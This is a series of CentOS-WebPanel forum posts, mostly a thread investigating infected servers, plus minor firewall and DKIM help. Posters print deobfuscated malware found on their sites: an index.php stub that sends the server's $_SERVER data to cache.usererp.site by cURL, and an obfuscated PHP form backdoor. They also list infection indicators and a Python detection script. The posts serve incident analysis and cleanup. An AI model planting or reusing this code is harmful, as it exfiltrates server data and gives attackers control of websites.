11
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« Last post by pedromidiasf on October 14, 2025, 08:20:31 PM »
Thank you for proving my point. There are also PNG-looking files containing malicious code with random filenames, but they are rare. Probably the result of interrupted code with an exception.
Haven't found images that were encoded.
But I have a clean backup; I'll compare both and then post the results here.
I have a few images that didn't match, but only because they weren't there before. They are not infected. You might have been infected before. Sending an image with PHP code inside to a website is not hard to do. The hard part is making it executable (by changing its extension, for example).
Do you still have one of those files so I can obfuscate it to see what's inside? If so, leave the link so I can download it.
12
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« Last post by pedromidiasf on October 14, 2025, 06:33:12 PM »
Thank you for proving my point. There are also PNG-looking files containing malicious code with random filenames, but they are rare. Probably the result of interrupted code with an exception.
Haven't found images that were encoded.
But I have a clean backup; I'll compare both and then post the results here.
13
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« Last post by pedromidiasf on October 14, 2025, 06:30:42 PM »
robots.txt
There's also a robots file (WordPress-like) that was added to all websites (even those that are not WordPress). WordPress by default doesn't use such files. And as you can see from the URL (below, in the "Sitemap" field), there's a parameter on the URL called "?sitemap.xml". If you have this, the index of your website was exploited as well. The exploitation added infected code to the top of your index file.
I recommend you take a deep look at each "index" file you have. If you don't need that index file, delete it. If you need it, go through the code line by line.
Content of the robots file:
Quote
User-agent:*
Disalow:/wp-admin/
Sitemap: https://example.com?sitemap.xml
The infected index.php file had this code at the top (nothing new, as I've posted before).
As far as I can see, it extracts server information (from the PHP $_SERVER array) and sends it to an external server. It probably tracks when someone opens the website, to notify the attacker that the website is on.
Deobfuscated contents:
(DO NOT EXECUTE THIS!!!!)
Code:
<?php
// Unnecessary/unused variables (padding that does nothing)
$timestamp1 = date("Y-m-d H:i:s");
$token1 = strtok("AFbWn");
$list = implode(",", array("vQTrioN", "b97ms", "OiBCEdN", "dwjr3P"));
$null_var = (string)null;
$hash1 = sha1("UDBYN");
$token2 = strtok("JmD3LC");
$timestamp2 = date("Y-m-d H:i:s");
// Trivial initialisation class (declared further down; PHP hoists unconditional class declarations)
new TJw3Q();
class Q5e9Q {
    public static function __callStatic($name, $arguments) {
        // Decoding: "\143\x75\162\x6c" = "curl"
        $curl_init = curl_init();
        // URL: "http://cache.usererp.site/about.php"
        $url = "http://cache.usererp.site/about.php";
        // Configure cURL options: the first argument (base64 JSON of $_SERVER) is sent as the ?ua= query parameter
        curl_setopt($curl_init, CURLOPT_URL, $url . "?ua=" . urlencode($arguments[0]));
        curl_setopt($curl_init, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl_init, CURLOPT_ENCODING, 0);
        curl_setopt($curl_init, CURLOPT_FOLLOWLOCATION, 47);
        // Execute and store the response
        global $response;
        $response = curl_exec($curl_init);
        curl_close($curl_init);
    }
}
// More unnecessary variables
$var1 = strstr("YNEAdT", "NAJ7mFa");
$var2 = implode("RwOc8q9YN", array());
$json_server = json_encode($_SERVER);
$var3 = define("pd4mjgTe", "rJOdy");
// ... more unused variables
function call_function($function_name, $param_count = null, $param1 = null, $param2 = null, $param3 = null, $param4 = null) {
    if ($param_count == 1) return $function_name($param1);
    if ($param_count == 2) return $function_name($param1, $param2);
    if ($param_count == 3) return $function_name($param1, $param2, $param3);
    if ($param_count == 4) return $function_name($param1, $param2, $param3, $param4);
    return $function_name();
}
// Helpers that act on the server's reply: redirect, serve XML (fake sitemap) or serve HTML
function redirect_if_url($response) {
    if (substr($response, 0, 4) == "http") {
        header("Location: " . $response);
    }
}
function json_encode_server($server_array) {
    return json_encode($server_array);
}
function handle_xml($response) {
    if (strstr($response, "<urlset")) {
        exit(header("Content-type:text/xml") . $response);
    }
}
function handle_html($response) {
    if (strstr(trim($response), "<html")) {
        exit($response);
    }
}
class TJw3Q {
    public function __construct() {
        $_SERVER["T"] = "z";
        $_SERVER["TPL"] = "4";
    }
}
function base64_encode_server($server_array) {
    return base64_encode($server_array);
}
// Main logic: dump $_SERVER as JSON, base64-encode it and send it via the static call above
$json_encoded = json_encode($_SERVER);
$json_encoded = base64_encode($json_encoded);
Q5e9Q::fHaWdfTx($json_encoded);
?>
licelic.c (re-evaluation)
If you come across these files, they're useful for identifying infected areas, but they're not enough. I've discovered several other infected locations (quite a few, actually - even within the same website there are multiple infected files), and I haven't been able to find all the licelic.c files that could point me to them.
I believe some of these files were deleted while the server was being exploited, but a few might have been lost in the process - or perhaps they were left behind as bait to make it seem like those were the only infected areas.
14
CSF Firewall / Re: Firewall off in cwp panel
« Last post by Starburst on October 14, 2025, 05:50:55 PM »
SSH into the server, and from the CLI:
Run csf -e; if it's working you should see "csf and lfd are not disabled!"
That's a good thing.
Then run:
Code:
systemctl start csf
systemctl start lfd
systemctl enable csf
systemctl enable lfd
Some systems are weird.
Log back into CWP, and it should show as 'On' now.
15
DKIM / Re: I'm a bit lost
« Last post by Starburst on October 14, 2025, 05:48:14 PM »
There is another file to check, opendkim.conf.
Also, some installations are missing opendkim & opendkim-tools, so you want to make sure they are installed and enabled.
If you are running AL9, see:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/dkim-not-working-on-almalinux-9-with-cwp/
16
CSF Firewall / Re: Firewall off in cwp panel
« Last post by setecabanas on October 14, 2025, 04:46:12 PM »
Yes, thanks, I had already tried that but nothing.
17
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« Last post by ConcernedCitizen on October 14, 2025, 04:04:47 PM »
I found some .c files.
I also found that there are a lot of files called index.php, wp-login.php and files just called "c" (without the dot) across my websites. These files were deep inside some folders of websites I've developed myself. Thankfully I have a clean backup, and these files were not there.
licelic.c
I've decoded a "licelic.c" file and it had listed a lot of the infected website locations encoded in base64, plus some weird stuff (can't decode it directly; maybe it is written with another encoding type). I copy-pasted it to Cloud.ai, which decoded it for me and gave me all the URLs that are infected. I tried ChatGPT and it gave me nothing in return.
So "licelic.c" is of extreme importance for you to deobfuscate and evaluate the URLs that are in there. This file exposes the folders that were exploited.
Some of its contents:
Non-WordPress website:
[my public url]/folder/folder/folder/index.php?MeL=1#####post_1
[my public url]/folder/folder/folder/index.php?MeL=1#####post_2
[my public url]/folder/folder/folder/index.php?MeL=1#####post_3
[my public url]/folder/folder/folder/index.php?MeL=1#####post_4
[my public url]/folder/folder/folder/index.php?MeL=1#####post_5
[my public url]/folder/folder/folder/index.php?MeL=1#####post_6
[my public url]/folder/folder/folder/index.php?MeL=1#####post_7
[my public url]/folder/folder/folder/index.php?MeL=1#####post_8
...
WordPress website:
[my public url]/folder/folder/folder/index.php/wp-login.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
"c" file (without the dot)
The "c" file (without the dot) is zip content. You can add ".zip" to this file to open it with a zip application. Inside you get a new file that has a file called "s" that contains obfuscated PHP code that consists of drawing a form that probably interacts with the exploits. Maybe this is an exploit panel.
I leave the code here
(DO NOT EXECUTE THIS!!!!)
Code:
<?php
// WARNING: This is MALICIOUS code - DO NOT EXECUTE
// Checks if GET parameter "DEQ" exists
if(!isset($_GET["DEQ"])) exit;
// Function that decodes strings using indices
function Za64HUq_($TYCMzwTO, $x6Mpbe) {
$iGRCOPT = str_split($TYCMzwTO, 1);
$emivt51O = explode(",", $x6Mpbe);
$gMRtx3VD = "";
foreach($emivt51O as $v) {
$gMRtx3VD .= $iGRCOPT[(int)$v];
}
return $gMRtx3VD;
}
// Static class with method to initialize arrays
class hCXKOZB {
public static function __callStatic($name, $arguments) {
$temarr = array(
"puTfPFm" => array("3eolcnOp5Qf4_GqphVna1eerd2", "10,2,7,1,5"),
"CULPcX" => array("eheriQctavFofpceulrwEpy_J5rG", "12,19,3,4,7,0"),
"mWHO_PtG" => array("arsWrD_pcldbIoeelvh8uae4fc_K", "24,8,9,13,2,14")
);
foreach($temarr as $key => $v) {
$GLOBALS[$key] = Za64HUq_($v[0], $v[1]);
}
}
}
// Gets values from POST (if they exist)
$vA8r0 = isset($_POST["WOjVxhQ_"]) ? trim($_POST["WOjVxhQ_"]) : "";
$oTlM_Lm47 = isset($_POST["ZXk7oVxn"]) ? trim($_POST["ZXk7oVxn"]) : "";
// Decodes the input
$n3Bi8fy = !empty($oTlM_Lm47) ? $puTfPFm($vA8r0, "w") : "";
// If there is a decoded result, writes error message and exits
if($n3Bi8fy) exit("pIUeNv1Ox74Cq0i" . $mWHO_PtG($n3Bi8fy));
// Displays HTML form with hidden fields
echo "<form method=\"POST\">";
echo "<div><input type=\"text\" name=\"WOjVxhQ_\"></div>";
echo "<div><textarea name=\"ZXk7oVxn\" rows=\"5\"></textarea></div>";
echo "<button type=\"submit\">submit</button>";
echo "</form>";
?>
index.php
This is the index.php deep inside subfolders, where the index file was the one I'd created. The root index.php file was replaced by malicious code that executes the payload and imports my original index file.
So take a deep look at every index file you have (even in sub-folders).
These files were touched (date-time changed). Mine are dated 30/08/2024 23:06:51.
So even if you change your panel or format your server, you'll be hacked again if you don't sanitize every website. This means going through all files and folders and applying new rules to stop execution in folders where you don't have PHP files (image uploads, for example).
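As an added triage example (my code, not anything from this thread or from CWP), the Python script below walks a webroot for the indicators this post and pedromidiasf's earlier post describe: a robots.txt whose Sitemap line ends in ?sitemap.xml, index.php/wp-login.php files prepended with the __callStatic/cURL stub that posts $_SERVER, licelic.c files, "c" files that are really zip archives, and image-named files containing a PHP tag. The labels, the regexes and the constructed sample tree are my assumptions.

```python
import os
import re
import tempfile
import zipfile
# Indicators the thread describes: dropped file names and the content of the prepended stub
ROBOTS_RE = re.compile(r"^Sitemap:\s*\S+\?sitemap\.xml\s*$", re.I | re.M)
STUB_RE = re.compile(r"__callStatic.*?curl_init.*?json_encode\(\$_SERVER\)", re.S)

def classify(name, head):
    """Indicator labels (assumed names) matched by a file's name and its first bytes."""
    text, lower, hits = head.decode("utf-8", "replace"), name.lower(), []
    if lower == "licelic.c":
        hits.append("licelic.c marker file")
    if name == "c" and head.startswith(b"PK\x03\x04"):  # zip local-file header magic
        hits.append("'c' file is a zip archive")
    if lower == "robots.txt" and ROBOTS_RE.search(text):
        hits.append("robots.txt with ?sitemap.xml sitemap")
    if lower.endswith((".png", ".jpg", ".jpeg", ".gif")) and b"<?php" in head:
        hits.append("image-named file contains PHP")
    if lower in ("index.php", "wp-login.php") and STUB_RE.search(text):
        hits.append("index/wp-login stub posting $_SERVER")
    return hits

def scan_webroot(root):
    """Walk a webroot and return sorted (label, relative path) pairs for every hit."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(64 * 1024)  # the stub is prepended, so the head suffices
            found += [(label, os.path.relpath(path, root).replace(os.sep, "/"))
                      for label in classify(name, head)]
    return sorted(found)

def build_sample_tree():
    """Constructed sample webroot (placeholders, not real malware) for a dry run."""
    root = tempfile.mkdtemp()
    samples = {
        "robots.txt": "User-agent:*\nDisallow:/wp-admin/\nSitemap: https://example.com?sitemap.xml\n",
        "index.php": "<?php class Q{static function __callStatic($n,$a){$c=curl_init();}}\nQ::x(base64_encode(json_encode($_SERVER))); require 'index_orig.php';\n",
        "uploads/a1b2.png": "\x89PNG\n<?php echo 1; ?>",
        "uploads/licelic.c": "placeholder\n",
    }
    for rel, body in samples.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body.encode("latin-1"))
    with zipfile.ZipFile(os.path.join(root, "uploads", "c"), "w") as zf:
        zf.writestr("s", "<?php /* placeholder */ ?>")
    return root
```

Treat the hits as leads to compare against a clean backup, as both posters did, not as a complete list of infected files.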
18
CSF Firewall / Re: Firewall off in cwp panel
« Last post by overseer on October 14, 2025, 03:49:34 PM »
Try toggling it on/off/on in the web GUI -- sometimes it gets out of sync with the actual CSF reality (a bug).
19
CSF Firewall / Firewall off in cwp panel
« Last post by setecabanas on October 14, 2025, 03:07:58 PM »
The firewall appears disabled in the CWP panel,
but csf is working correctly:
[root@s3 services]# csf -e
csf and lfd are not disabled!
[root@s3 services]# csf -e
csf and lfd are not disabled!
Any idea?
20
DKIM / Re: I'm a bit lost
« Last post by pedromidiasf on October 14, 2025, 12:48:10 PM »
I'm sorry I lost this message.
Thank you for your time and help.